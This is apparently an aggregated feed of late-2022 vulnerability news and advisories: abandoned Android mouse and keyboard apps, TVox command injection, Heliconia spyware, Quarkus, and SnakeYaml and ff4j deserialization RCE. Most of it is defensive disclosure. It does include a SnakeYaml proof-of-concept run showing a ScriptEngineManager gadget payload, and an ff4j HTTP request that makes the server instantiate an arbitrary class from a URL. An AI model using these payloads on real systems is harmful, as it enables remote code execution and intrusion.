Categories: News
Tags: CVE

Tags:  android

Tags:  apps

Tags:  abandonware

Tags:  vulnerability

Tags:  bug

Tags:  telepad

Tags:  pc keyboard

Tags:  lazy mouse

Three abandoned Android apps with remote code execution vulnerabilities need to be shown the door.



(Read more...)




The post Time to uninstall! Abandoned Android apps pack a vulnerability punch appeared first on Malwarebytes Labs.

Posted: December 2, 2022 by

Synopsis has published an advisory warning of multiple vulnerabilities across three different Android remote mouse and keyboard apps with a combined install count of about two million. The apps are at risk from remote code execution (RCE), and there’s no sign of a fix coming anytime, ever.

Bleeping Computer notes that the issues were first discovered and reported to the developers in August. The advisory has been published after the developers failed to respond. If you have any of these apps on your mobile device, it’s probably well past the point where you should consider replacing them.

**Which apps are affected?**

The apps impacted by the details in the advisory are as follows:

*   Telepad versions 1.0.7 and prior
*   Lazy Mouse versions 2.0.1 and prior
*   PC Keyboard versions 30 and prior

The three apps are reported to be abandonware, which makes it even more essential to get word out with regard to the security issues at hand. With so many supported apps to choose from, there really is no need to stick to apps like these which are easily replaceable. It’s worth noting that these apps aren’t just available on Google Play.

Searching for them reveals multiple download locations elsewhere. If you find "updated" versions of the software elsewhere, do not install them. Criminals often disguise their malware as apps that are popular on Google Play and spread them on third-party markets. Having an app with a known RCE vulnerability is bad. Swapping it for one that has a known RCE vulnerability and may also contain malware is worse.

**A list of CVE problems**

There are seven Common Vulnerabilities and Exposures (CVEs) listed, with four of them racking up a 9.8 severity rating. The four big hitters listed by Synopsis are as follows:

**CVE-2022-45477**

Telepad allows remote unauthenticated users to send instructions to the server to execute arbitrary code without any previous authorization or authentication.

**CVE-2022-45479**

PC Keyboard allows remote unauthenticated users to send instructions to the server to execute arbitrary code without any previous authorization or authentication.

**CVE-2022-45481**

The default configuration of Lazy Mouse does not require a password, allowing remote unauthenticated users to execute arbitrary code with no prior authorization or authentication.

**CVE-2022-45482**

The Lazy Mouse server enforces weak password requirements and doesn’t implement rate limiting, allowing remote unauthenticated users to easily and quickly brute force the PIN and execute arbitrary commands.

The other three are **CVE-2022-45478**, **CVE-2022-45480**, and **CVE-2022-45483** respectively, which all involve machine-in-the-middle attacks and reading all keypresses in cleartext.

**What’s the fix for this?**

As noted above, there isn’t one other than deleting the applications. Despite initial outreach to the developers on August 13, further attempts at communication a few days later, and then one last attempt on October 12, no response was forthcoming.

The developers may no longer be taking an interest, but we strongly advise users to do so and make the right decision for their devices.

Stay safe out there!

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

**RELATED ARTICLES**

Time to uninstall! Abandoned Android apps pack a vulnerability punch

Telenia Software s.r.l TVox before v22.0.17 was discovered to contain a remote code execution (RCE) vulnerability in the component action_export_control.php.

21 Nov

**TVox 22.0.23**

_**INFORMAZIONE:**_

Dalla release  22.0.17 è stata introdotta la gestione della **Modalità di Lavoro**.

Per saperne di più clicca sul seguente link: **Modalità di Lavoro**

**Vulnerabilità rientrate**

Dalla release 22.0.22:

1.  Blind OS Command Injection
2.  Credenziali salvate in chiaro in file di configurazione
3.  Path Traversal

**Modifiche Funzionali**

*   TVOX – Apportate migliorie al processo pbxcdr per un consumo ottimizzato delle risorse
*   TVOX – Ottimizzata la gestione dei cambi stato Master-Slave-OFF per impianti ridondati e installati tramite iso cloud
*   OCC – Apportate migliorie alla rilevazione della presenza di personalizzazioni
*   OCC – Ottimizzata la presentazione grafica della disposizione di sala in fase di modifica

**Bug Fix**

*   TVOX – Risolto bug che impediva la trasmissione di messaggi audio registrati direttamente da client durante una sessione whatsapp
*   TVOX – Risolto bug relativo alla corretta gestione di trunk SIP su base IP
*   TVOX – Risolto bug che, nel caso di controllo del dispositivo TVox Team da client, comportava la mancata eliminazione del blocco chiamata dopo la conclusione di una chiamata
*   TVOX – Risolto bug che comportava la mancata corretta sincronizzazione di Rabbitmq su impianti Support ridondati
*   OCC – Ripristinato il pulsante di link al servizio/utente/conferenza/codice di servizio all’interno di una regola d’ingresso
*   OCC – Risolto bug che impediva di caricare lo stesso template con turni reperibilità su due skillset diversi
*   TCONSOLE7 – Risolto bug che, in alcuni casi, impediva di eseguire chiamate outbound tramite TConsole7

< BACK TO TIMELINE

CVE-2022-43333: TVox 22.0.23 - Telenia Software

L’**Offensive Security Team** di **Swascan** ha identificato **3 vulnerabilità** sul prodotto **Telenia Software TVOX**.

**Telenia Software TVOX**

**Telenia Software** è un Vendor Italiano presente nel mercato UC&C e Contact Center dal 1994. Sviluppano sistemi di Customer Interaction rivolti a medie e grandi aziende, pubbliche e private che hanno l’obiettivo di migliorare la qualità delle interazioni interne e i processi di supporto clienti Omnicanale misurando la soddisfazione e i livelli di servizio erogati sia nei canali tradizionali (Voce) che nei canali digitali (Mail/Ticket, Webchat, Sms, Video, IoT, WhatsApp, Telegram, Twitter ecc).

Azienda molto attenta e sensibile alle problematiche di sicurezza e la ringraziamo per la collaborazione durante la fase di responsible disclosure.

**Descrizione del prodotto**

**TVOX** è un potente strumento di marketing in grado di utilizzare diversi canali di comunicazione per interagire con i clienti.

**Technical summary**

L’Offensive Security Team di Swascan ha rilevato alcune vulnerabilità sulla ISO scaricabile: **TVox 22.0.14**

**Vulnerability**

**CVSSv3.1**

**Attack Vector**

**Blind OS Command Injection (non autenticato)**

**9.8 Critical**

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Credenziali salvate in chiaro in file di configurazione**

**9.4 Critical**

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

**Path Traversal**

**7.5 High**

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Nella sezione seguente vengono mostrati i dettagli tecnici delle vulnerabilità rilevate.

**Blind OS Command Injection (non autenticato) CVE-2022-43333****Descrizione**

L’asset **TVOX Web Client** è vulnerabile ad attacchi di tipo Blind OS Command Injection da parte di utenti non autenticati.

Un potenziale attaccante sarà in grado di eseguire comandi sul sistema operativo target con il livello di privilegio con cui è in esecuzione il programma effettuando delle semplici richieste GET da browser senza nessun tipo di autenticazione.

Assets

*   https://X.X.X.X/t-vox/manager/html/action\_export\_control.php \[pid\]

**Proof of Concept**

Si mostrano di seguito le evidenze della vulnerabilità e di come sia stato possibile eseguire un comando del sistema operativo locale della macchina, nello specifico, come è stata innescata la richiesta di download di un file dalla vps utilizzata nell’attacco.

Evidenza  1 –  Richiesta dell’URL con il parametro PID, accodando un secondo comando da eseguire

Evidenza  2 – L’immagine mostra il comando /usr/bin/nc che posto in attesa riceve una connessione dal server

In questo modo, attraverso chiamate successive è stato possibile effettuare l’upload di una web shell in php all’interno di una cartella scrivibile dall’utente locale www-data ed esposta all’esterno, tramite web server:

Evidenza  3 – L’immagine mostra come richiamare la web shell ed eseguire comandi del sistema operativo

Dopo un’attenta analisi è stato rilevato il punto in cui viene innescata la vulnerabilità, nel file:

**/opt/telenia/tvox/php/siti/t-vox/t-vox/manager/html/action\_export\_control.php**

Evidenza  4 – Parte di codice che causa la vulnerabilità

Come si vede dall’immagine precedente, la vulnerabilità è innescata in quanto il parametro passato dall’utente al file **action\_export\_control.php** non viene validato e viene accodato così com’è al parametro della funzione **exec** di php, permettendo la concatenazione di istruzioni multiple.

Inoltre tale file è richiamabile dall’esterno e non necessita di autenticazione.

Attraverso chiamate successive è stato possibile ottenere una shell remota sul sistema, permettendo l’accesso alla rete interna.

Evidenza  5 – Accesso alla rete interna ed esecuzione shell remota

**Riferimenti**

https://owasp.org/www-community/attacks/Command\_Injection

https://cwe.mitre.org/data/definitions/78.html

https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/OS\_Command\_Injection\_Defense\_Cheat\_Sheet.md

https://owasp.org/Top10/A03\_2021-Injection/

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

**Credenziali salvate in chiaro in file di configurazione****Descrizione**

È stata rilevata la presenza di credenziali non “cifrate” (hashed) all’interno del file di configurazione di Rocket.Chat.

Tale file è accessibile all’interno della distribuzione pubblica dell’applicativo da parte del vendor, e consente l’accesso amministrativo all’applicazione Rocket.Chat.

**Proof of Concept**

Analizzando la ISO messa a disposizione dal vendor è stato possibile constatare che le credenziali messe in chiaro all’interno del file di configurazione di Rocket.Chat **/etc/rocketchat/rocketchat.cfg** sono le stesse per l’applicazione nel sistema e hanno permesso l’accesso come amministratore all’appicativo Rocket.Chat

Evidenza  6 – Evidenza delle credenziali utilizzate per accedere all’applicazione Rocket.Chat

**Riferimenti**

https://owasp.org/www-community/vulnerabilities/Password\_Plaintext\_Storage

https://cheatsheetseries.owasp.org/cheatsheets/Password\_Storage\_Cheat\_Sheet.html

https://cwe.mitre.org/data/definitions/257.html

https://cwe.mitre.org/data/definitions/522.html

https://owasp.org/Top10/it/A04\_2021-Insecure\_Design/

**Path Traversal****Descrizione**

La vulnerabilità Path Traversal consente l’accesso a file presenti nel sistema operativo che risiedono al di fuori della web root dell’applicazione. Manipolando le variabili che richiedono i file, attraverso l’uso dei caratteri “../” o di un path assoluto (eg. C:\\…) è possibile accedere arbitrariamente ai file e/o cartelle contenuti nel sistema operativo come il codice sorgente dell’applicazione o file sensibili che risiedono nella macchina.

**Assets**

*   https://X.X.X.X/t-vox/repository\_update/get\_file\_list.php \[application\]

**Proof of Concept**

Lo script PHP in oggetto permetteva di listare il contenuto della cartella indicata nel parametro **application**, senza necessità di autenticazione e tramite una semplice chiamata GET via browser.

Di seguito vengono mostrate le evidenze di come è listare il contenuto di qualsiasi cartella di cui l’utente in esecuzione abbia lettura:

Evidenza  7 – Lista del contenuto cartella /home

Evidenza  8 – Esempio, contenuto della cartella /var/log

**Riferimenti**

https://cwe.mitre.org/data/definitions/23.html

https://owasp.org/Top10/A01\_2021-Broken\_Access\_Control/

https://owasp.org/www-community/attacks/Path\_Traversal

**Remediation**

Per tutte le remediation alle vulnerabilità descritte si consiglia per chi non l’avesse già fatto di aggiornare il software alla versione 22.0.23 presente all’indirizzo:

https://www.teleniasoftware.com/timeline/tvox-22-0-23/

**Disclosure Timeline**

*   19-07-2022: Vulnerabilità identificata
*   20-07-2022: Vendor contattato via email (1° tentativo)
*   26-07-2022: Vendor contattato via contatto dal sito (2° tentativo)
*   01-08-2022: Vendor contattato via form di chat sito (risposto, preso accordi via email)
*   08-11-2022: Assegnato cve-id: CVE-2022-43333 per la RCE
*   21-11-2022: Vendor pubblica aggiornamento 22.0.23 con i fix alle vulnerabilità
*   30-11-2022: Swascan pubblica la vulnerabilità

CVE-2022-43333: Security Advisory: Telenia Software TVOX

A Barcelona-based surveillanceware vendor named Variston IT is said to have surreptitiously planted spyware on targeted devices by exploiting several zero-day flaws in Google Chrome, Mozilla Firefox, and Windows, some of which date back to December 2018.

"Their Heliconia framework exploits n-day vulnerabilities in Chrome, Firefox, and Microsoft Defender, and provides all the tools necessary to deploy a payload to a target device," Google Threat Analysis Group (TAG) researchers Clement Lecigne and Benoit Sevens said in a write-up.

Variston, which has a bare-bones website, claims to "offer tailor made Information Security Solutions to our customers," "design custom security patches for any kind of proprietary system," and support the "the discovery of digital information by \[law enforcement agencies\]," among other services.

The vulnerabilities, which have been patched by Google, Microsoft, and Mozilla in 2021 and early 2022, are believed to have been utilized as zero-days to help customers install malware of their choice on the targeted systems.

Heliconia comprises a trio of components, namely Noise, Soft, and Files, each of which are responsible for deploying exploits against bugs in Chrome, Windows, and Firefox, respectively.

Noise is designed to take advantage of a security flaw in the Chrome V8 engine JavaScript engine that was patched in August 2021 as well as an unknown sandbox escape method called "chrome-sbx-gen" to enable the final payload (aka "agent") to be installed on targeted devices.

However, the attack banks on the prerequisite that the victim accesses a booby-trapped webpage to trigger the first-stage exploit.

Heliconia Noise can be additionally configured by the purchaser using a JSON file to set different parameters like the maximum number of times to serve the exploits, an expiration date for the servers, redirect URLs for non-target visitors, and rules specifying when a visitor should be considered a valid target.

Soft is a web framework that's engineered to deliver a decoy PDF document featuring an exploit for CVE-2021-42298, a remote code execution flaw impacting Microsoft Defender that was fixed by Redmond in November 2021. The infection chain, in this case, entailed the user visiting a malicious URL, which then served the weaponized PDF file.

The Files package – the third framework – contains a Firefox exploit chain for Windows and Linux that leverages a use-after-free flaw in the browser that was reported in March 2022 (CVE-2022-26485). However, it's suspected that the bug was likely abused since at least 2019.

Google TAG said it became aware of the Heliconia attack framework after receiving an anonymous submission to its Chrome bug reporting program. It further noted that there's no current evidence of exploitation, either indicating the toolset has been put to rest or evolved further.

The development arrives more than five months after the tech giant's cybersecurity division linked a previously unattributed Android mobile spyware, dubbed Hermit, to Italian software outfit, RCS Lab.

"The growth of the spyware industry puts users at risk and makes the Internet less safe, and while surveillance technology may be legal under national or international laws, they are often used in harmful ways to conduct digital espionage against a range of groups," the researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Accuses Spanish Spyware Vendor of Exploiting Chrome, Firefox, and Windows Zero-Days

A Barcelona-based surveillanceware vendor named Variston IT is said to have surreptitiously planted spyware on targeted devices by exploiting several zero-day flaws in Google Chrome, Mozilla Firefox, and Windows, some of which date back to December 2018.
"Their Heliconia framework exploits n-day vulnerabilities in Chrome, Firefox, and Microsoft Defender, and provides all the tools necessary to

A critical security vulnerability has been disclosed in the Quarkus Java framework that could be potentially exploited to achieve remote code execution on affected systems.
Tracked as CVE-2022-4116 (CVSS score: 9.8), the shortcoming could be trivially abused by a malicious actor without any privileges.
"The vulnerability is found in the Dev UI Config Editor, which is vulnerable to drive-by

A critical security vulnerability has been disclosed in the Quarkus Java framework that could be potentially exploited to achieve remote code execution on affected systems.

Tracked as CVE-2022-4116 (CVSS score: 9.8), the shortcoming could be trivially abused by a malicious actor without any privileges.

"The vulnerability is found in the Dev UI Config Editor, which is vulnerable to drive-by localhost attacks that could lead to remote-code execution (RCE)," Contrast Security researcher Joseph Beeton, who reported the bug, said in a write-up.

Quarkus, developed by Red Hat, is an open source project that's used for creating Java applications in containerized and serverless environments.

It's worth pointing out that the issue only impacts developers who are running Quarkus and are tricked into visiting a specially crafted website, which is embedded with malicious JavaScript code designed to install or execute arbitrary payloads.

This could take the form of a spear-phishing or a watering hole attack without requiring any further interaction on the part of the victim. Alternatively, the attack can be pulled off by serving rogue ads on popular websites frequented by developers.

The Dev UI, which is offered through a Dev Mode, is bound to localhost (i.e., the current host) and allows a developer to monitor the status of an application, change the configuration, migrate databases, and clear caches.

Because it's restricted to the developer's local machine, the Dev UI also lacks crucial security controls like authentication and cross-origin resource sharing (CORS) to prevent a fraudulent website from reading another site's data.

The problem identified by Contrast Security lies in the fact that the JavaScript code hosted on a malware-laced website can be weaponized to modify the Quarkus application configuration via an HTTP POST request to trigger code execution.

"While it only affects Dev Mode, the impact is still high, as it could lead to an attacker getting local access to your development box," Quarkus noted in an independent advisory.

Users are recommended to upgrade to version 2.14.2.Final and 2.13.5.Final to safeguard against the flaw. A potential workaround is to move all the non-application endpoints to a random root path.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Disclose Critical RCE Vulnerability Affecting Quarkus Java Framework

SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization.

**Package**

Constructor (SnakeYaml)

**Summary**

SnakeYaml's Constructor class, which inherits from SafeConstructor, allows  
any type be deserialized given the following line:

new Yaml(new Constructor(TestDataClass.class)).load(yamlContent);

Types do not have to match the types of properties in the  
target class. A ConstructorException is thrown, but only after a malicious  
payload is deserialized.

**Severity**

High, lack of deserialization allows remote code execution.

**Proof of Concept**

Execute bash run.sh. The PoC uses Constructor to deserialize a payload  
for RCE. RCE is demonstrated by using a payload which performs a http request to  
http://127.0.0.1:8000.

Example output of successful run of proof of concept:

    $ bash run.sh
    
    [+] Downloading snakeyaml if needed
    [+] Starting mock HTTP server on 127.0.0.1:8000 to demonstrate RCE
    nc: no process found
    [+] Compiling and running Proof of Concept, which a payload that sends a HTTP request to mock web server.
    [+] An exception is expected.
    Exception:
    Cannot create property=payload for JavaBean=Main$TestDataClass@3cbbc1e0
     in 'string', line 1, column 1:
        payload: !!javax.script.ScriptEn ... 
        ^
    Can not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager
     in 'string', line 1, column 10:
        payload: !!javax.script.ScriptEngineManag ... 
                 ^
    
    	at org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:291)
    	at org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.construct(Constructor.java:172)
    	at org.yaml.snakeyaml.constructor.Constructor$ConstructYamlObject.construct(Constructor.java:332)
    	at org.yaml.snakeyaml.constructor.BaseConstructor.constructObjectNoCheck(BaseConstructor.java:230)
    	at org.yaml.snakeyaml.constructor.BaseConstructor.constructObject(BaseConstructor.java:220)
    	at org.yaml.snakeyaml.constructor.BaseConstructor.constructDocument(BaseConstructor.java:174)
    	at org.yaml.snakeyaml.constructor.BaseConstructor.getSingleData(BaseConstructor.java:158)
    	at org.yaml.snakeyaml.Yaml.loadFromReader(Yaml.java:491)
    	at org.yaml.snakeyaml.Yaml.load(Yaml.java:416)
    	at Main.main(Main.java:37)
    Caused by: java.lang.IllegalArgumentException: Can not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager
    	at java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:167)
    	at java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:171)
    	at java.base/jdk.internal.reflect.UnsafeObjectFieldAccessorImpl.set(UnsafeObjectFieldAccessorImpl.java:81)
    	at java.base/java.lang.reflect.Field.set(Field.java:780)
    	at org.yaml.snakeyaml.introspector.FieldProperty.set(FieldProperty.java:44)
    	at org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:286)
    	... 9 more
    [+] Dumping Received HTTP Request. Will not be empty if PoC worked
    GET /proof-of-concept HTTP/1.1
    User-Agent: Java/11.0.14
    Host: localhost:8000
    Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
    Connection: keep-alive
    

**Further Analysis**

Potential mitigations include, leveraging SnakeYaml's SafeConstructor while parsing untrusted content.

**Timeline**

**Date reported**: 4/11/2022  
**Date fixed**:  
**Date disclosed**: 10/13/2022

CVE-2022-1471: SnakeYaml: Constructor Deserialization Remote Code Execution

ff4j 1.8.1 is vulnerable to Remote Code Execution (RCE).

**ff4j is vulnerable to Remote Code Execution (RCE)**

Critical severity GitHub Reviewed Published Dec 1, 2022 • Updated Dec 5, 2022

GHSA-65hj-9ppw-77xc: ff4j is vulnerable to Remote Code Execution (RCE)

ff4j can be use to call any constructors in the project or jvm.  
it would raise an error after constructor call and give an error in response.

    File: https://github.com/ff4j/ff4j/blob/master/ff4j-core/src/main/java/org/ff4j/property/util/PropertyFactory.java
    Function: public static Property<?> createProperty(String pName, String pType, String pValue, String desc, Set < String > fixedValues)
    Line:163 and 164
    

    git clone https://github.com/ff4j/ff4j-samples.git
    cd spring-boot-2x/ff4j-sample-springboot2x
    mvn spring-boot:run
    

    PUT /api/ff4j/propertyStore/properties/test HTTP/1.1
    Host: 127.0.0.1
    Content-Type: application/json
    accept: application/json
    Content-Length: 111
    
    { "name": "test", "description": null, "type": "org.springframework.core.io.support.ResourcePropertySource", "value": "http://example/index.html"}

Tag

#rce